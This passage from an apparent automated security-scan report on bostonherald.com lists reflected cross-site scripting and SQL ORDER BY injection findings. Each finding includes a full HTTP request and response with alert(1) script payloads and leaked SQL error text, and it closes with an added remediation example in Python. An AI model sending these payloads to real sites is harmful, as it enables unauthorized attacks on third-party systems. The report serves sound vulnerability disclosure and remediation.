Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/mass_pike/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c260f(a)d58a654d6ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/mass_pike/?c260f(a)d58a654d6ed=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 370
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?c260f(a)d58a654d6ed=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?c260f(a)d58a654d6ed=1 LIMIT 0,20' at line
...[SNIP]...

4.806. http://www.bostonherald.com/projects/payroll/quasi_state/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quasi_state/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6c960(a)77d7148e6d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/quasi_state/?6c960(a)77d7148e6d8=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:39:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 540
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*, b.agency FROM `quasi_state_data` a INNER JOIN `quasi_state_agencies` b ON a.quasi_state_agency_id = b.id WHERE 1=1 ORDER BY ?6c960(a)77d7148e6d8=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?6c960(a)77d7148e6d8=1 LIMIT 0,20' at line
...[SNIP]...

4.807. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quincy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload eb58b(a)bc791e733d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/quincy/?eb58b(a)bc791e733d=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 365
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?eb58b(a)bc791e733d=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?eb58b(a)bc791e733d=1 LIMIT 0,20' at line 1
...[SNIP]...

4.808. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quincy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b364'-alert(1)-'a0ab3d5c958 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/quincy/?4b364'-alert(1)-'a0ab3d5c958=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 395
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?4b364'-alert(1)-'a0ab3d5c958=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?4b364'-alert(1)-'a0ab3d5c958=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

4.809. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/suffolk/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a52a7'-alert(1)-'3fe2c2f08cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/suffolk/?a52a7'-alert(1)-'3fe2c2f08cd=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:34:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 397
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?a52a7'-alert(1)-'3fe2c2f08cd=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?a52a7'-alert(1)-'3fe2c2f08cd=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

4.810. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/suffolk/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 48b0d(a)6246e4e221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/suffolk/?48b0d(a)6246e4e221=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:34:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 367
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?48b0d(a)6246e4e221=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?48b0d(a)6246e4e221=1 LIMIT 0,20' at line 1
...[SNIP]...

4.811. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/worcester/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e29cc'-alert(1)-'a2f2f71b2c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/worcester/?e29cc'-alert(1)-'a2f2f71b2c7=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:42:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 401
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?e29cc'-alert(1)-'a2f2f71b2c7=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?e29cc'-alert(1)-'a2f2f71b2c7=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

4.812. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/worcester/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4ac7(a)0dc08ce248a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/worcester/?f4ac7(a)0dc08ce248a=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:42:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 374
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?f4ac7(a)0dc08ce248a=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?f4ac7(a)0dc08ce248a=1 LIMIT 0,20' at line
...[SNIP]...
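The response above echoes the full SQL statement, with the supplied parameter name placed directly in its ORDER BY clause and a MySQL syntax error alongside it. A sort column cannot be bound as a prepared-statement parameter, so concatenation of this kind is usually fixed with an allow-list: the names a client may send are mapped to the identifiers the query may use, and anything else gets the default order. The following is an added example in Python with SQLite, not the site's code; the table name worcesterData is taken from the error above, while its columns and rows are assumed for illustration.

```python
"""Allow-listed ORDER BY: the sort column and direction come from a fixed map,
never from request text.

Added example (Python + SQLite), not the application's code. The table name
worcesterData comes from the error message in the report; its columns and the
sample rows are assumed for illustration.
"""
import sqlite3

# Client-visible sort names -> SQL identifiers the query is allowed to use.
SORT_COLUMNS = {"name": "name", "title": "title", "pay": "pay"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}
PAGE_SIZE = 20

# The parameter name the scanner sent, as echoed in the error message.
PROBE = "?f4ac7(a)0dc08ce248a=1"


def _db() -> sqlite3.Connection:
    """In-memory table with constructed rows (columns are assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE worcesterData (name TEXT, title TEXT, pay REAL)")
    conn.executemany("INSERT INTO worcesterData VALUES (?, ?, ?)",
                     [("Adams", "Clerk", 41000.0),
                      ("Baker", "Analyst", 58000.0),
                      ("Cole", "Director", 97000.0)])
    return conn


def vulnerable_sql(sort: str) -> str:
    """The pattern the error message reveals: request text pasted into ORDER BY."""
    return "SELECT a.* FROM worcesterData a WHERE 1=1 ORDER BY %s LIMIT 0,20" % sort


def build_query(sort: str, direction: str = "asc", page: int = 0) -> tuple:
    """Return (sql, params). Only identifiers from the allow-list reach the SQL
    text; LIMIT/OFFSET are bound as parameters. Unknown names fall back to the
    default order instead of raising, so probes get no error to learn from."""
    column = SORT_COLUMNS.get(sort, "name")
    order = SORT_DIRECTIONS.get(direction.lower(), "ASC")
    sql = ("SELECT a.* FROM worcesterData a WHERE 1=1 "
           "ORDER BY a.%s %s LIMIT ? OFFSET ?" % (column, order))
    return sql, (PAGE_SIZE, max(page, 0) * PAGE_SIZE)


def run(sort: str, direction: str = "asc", page: int = 0) -> list:
    """Execute the allow-listed query and return the names in result order."""
    conn = _db()
    try:
        sql, params = build_query(sort, direction, page)
        return [row[0] for row in conn.execute(sql, params)]
    finally:
        conn.close()


def vulnerable_breaks(sort: str) -> bool:
    """True if the concatenating query fails on this input (the report's
    MySQL syntax error, reproduced here against SQLite)."""
    conn = _db()
    try:
        conn.execute(vulnerable_sql(sort)).fetchall()
        return False
    except sqlite3.Error:
        return True
    finally:
        conn.close()
```

Falling back silently to the default order is one design choice; rejecting unknown sort names with a 400 is equally valid, as long as the rejected value never reaches the SQL text.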

4.813. http://www.bostonherald.com/search/ [topic parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /search/

Issue detail

The value of the topic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2820"><script>alert(1)</script>647d2a3054 was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?topic=Rep.+James+Valleec2820"><script>alert(1)</script>647d2a3054&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:08:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<input class="mainSearchinut" id="searchInput" type="text" value="Rep. James Valleec2820"><script>alert(1)</script>647d2a3054" name="topic" />
...[SNIP]...

4.814. http://www.bostonherald.com/search/ [topic parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /search/

Issue detail

The value of the topic request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60651</script><script>alert(1)</script>03fb46f749a was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Note that this payload never leaves the single-quoted JavaScript string: the HTML parser ends the script element at the first literal </script> sequence regardless of JavaScript quoting, so escaping quotes and backslashes alone does not stop it. Any value placed inside a script block must also have the sequences </ and <!-- encoded (for example, every < as the JavaScript escape \u003c) on top of the ordinary string escaping.

Request

GET /search/?topic=Rep.+James+Vallee60651</script><script>alert(1)</script>03fb46f749a&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:08:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<script language="Javascript">
// Ajax search


page($('search_opt_type').options[$('search_opt_type').selectedIndex].value,'1','','search','Rep. James Vallee60651</script><script>alert(1)</script>03fb46f749a');
//pageTracker._trackPageview('/search/index.bg?&amp;order=&amp;page=1');
location.hash='articleFull';
</script>
...[SNIP]...
